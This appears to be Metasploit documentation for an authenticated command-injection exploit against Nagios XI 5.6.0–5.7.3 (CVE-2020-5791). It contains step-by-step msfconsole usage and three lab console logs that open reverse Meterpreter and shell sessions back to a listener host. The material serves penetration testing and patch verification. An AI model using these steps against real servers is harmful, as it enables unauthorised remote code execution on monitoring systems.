## Vulnerable Application
This module exploits CVE-2020-5791, an OS command injection vulnerability in `admin/mibs.php` that enables
an authenticated user with admin privileges to achieve remote code execution as either the `apache` user or the
`www-data` user on NagiosXI 5.6.0 to 5.7.3 inclusive (exact user depends on the version of NagiosXI
installed as well as the OS its installed on).

The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
obtain the Nagios XI version number, which is then used to check if the target is version 5.6.0-5.7.3 and therefore vulnerable.

Next, the module executes the payload via an HTTP GET request to `admin/mibs.php`.
For this request, the value of the GET parameter `file` is set to the payload.
The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1),
However, the only reliable `cmd/unix` payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be
`cmd/unix/reverse_perl_ssl` and `cmd/unix/reverse_openssl`.

Valid credentials for a Nagios XI admin user are required.
This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.

Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
Detailed installation instructions are available
[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_mibs_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]`
5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### FINISH_INSTALL
If this is set to `true`, the module will try to finish installing Nagios XI on targets where the installation has not been completed.
This includes signing the license agreement. The default value is `false`.
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.

## Targets
```
Id  Name
--  ----
0   Linux (x86/x64)
1   CMD
```

## Scenarios
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set rhosts 192.168.1.16
rhosts => 192.168.1.16
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set password nagiosadmin
password => nagiosadmin
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Sending stage (980808 bytes) to 192.168.1.16
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:55158) at 2021-04-01 13:18:20 -0400

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set rhosts 192.168.1.16
rhosts => 192.168.1.16
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set password nagiosadmin
password => nagiosadmin
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set target 1
target => 1
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse SSL handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.16:55162) at 2021-04-01 13:18:31 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```

### Nagios 5.6.5 on Ubuntu 20.04 LTS
```
msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set RHOSTS 172.19.34.88
RHOSTS => 172.19.34.88
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set LHOST 172.19.37.24
LHOST => 172.19.37.24
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.19.37.24:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Sending stage (980808 bytes) to 172.19.34.88
[*] Meterpreter session 1 opened (172.19.37.24:4444 -> 172.19.34.88:49942) at 2021-04-16 12:40:40 -0500

meterpreter > getuid
Server username: www-data @ test-Virtual-Machine (uid=33, gid=33, euid=33, egid=33)
meterpreter > getprivs
[-] The "getprivs" command is not supported by this Meterpreter type (x86/linux)
meterpreter > shell
Process 11695 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),132(Debian-snmp),1001(nagios),1002(nagcmd)
whoami
www-data
```
